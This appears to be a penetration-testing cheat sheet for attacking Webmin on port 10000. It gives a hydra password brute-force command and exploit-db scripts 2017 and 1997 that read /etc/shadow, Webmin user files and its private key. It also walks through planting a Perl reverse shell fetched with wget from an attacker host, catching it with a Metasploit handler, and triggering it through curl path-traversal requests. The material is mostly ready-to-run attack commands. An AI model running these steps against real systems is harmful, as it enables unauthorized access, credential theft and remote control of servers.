Webmin – port 10000

Webmin is one of the world’s most popular open-source web-based applications for managing Unix-based systems. It allows management of a system remotely through a Web-GUI.

URL like http://x.x.x.x:10000/

Bruteforce Login Page

IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt
FAILED_MSG="Login failed. Please try again."
COOKIES="testing=1"

hydra $IP -s 10000 -t 4 http-form-post "/session_login.cgi:page=%2F&user=admin&pass=^PASS^&submit=Login:${FAILED_MSG}:H=Cookie: ${COOKIES}" -l admin -P $WL -vV -f

Useful exploits

Webmin < 1.290 / Usermin < 1.220 – Arbitrary File Disclosure

https://www.exploit-db.com/exploits/2017

searchsploit -m 2017
chmod u+x 2017.pl
IP=x.x.x.x
PORT=10000
./2017.pl $IP $PORT /etc/passwd http
./2017.pl $IP $PORT /etc/shadow http
./2017.pl $IP $PORT /etc/webmin/miniserv.conf http
./2017.pl $IP $PORT /etc/webmin/miniserv.users http
./2017.pl $IP $PORT /etc/webmin/miniserv.pem http

Local File Inclusion (LFI)

USE IT AS A LOCAL FILE INCLUSION!!

Distribute a reverse shell payload (perl)

cp /usr/share/webshells/perl/perl-reverse-shell.pl rshell.cgi
nano rshell.cgi
# Edit IP and port for reverse shell
python3 -m http.server 80

On victim

cd /tmp
wget -O rshell.cgi http://KALI_IP/rshell.cgi
chmod 755 rshell.cgi

On Kali

msf-multi.rc:
use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST tun0
set LPORT 443
set ExitOnSession false
exploit -j
sudo msfconsole -q -r msf-multi.rc
IP=x.x.x.x
PORT=10000
./2017.pl $IP $PORT /tmp/rshell.cgi http

Same can be done with exploit 1997

https://www.exploit-db.com/exploits/1997

sudo apt install php-curl
IP=x.x.x.x
PORT=10000
php 1997.php $IP $PORT http /tmp/rshell.cgi

Exploit 1997 – using curl

curl 'http://x.x.x.x:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow'
curl 'http://x.x.x.x:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/rshell.cgi'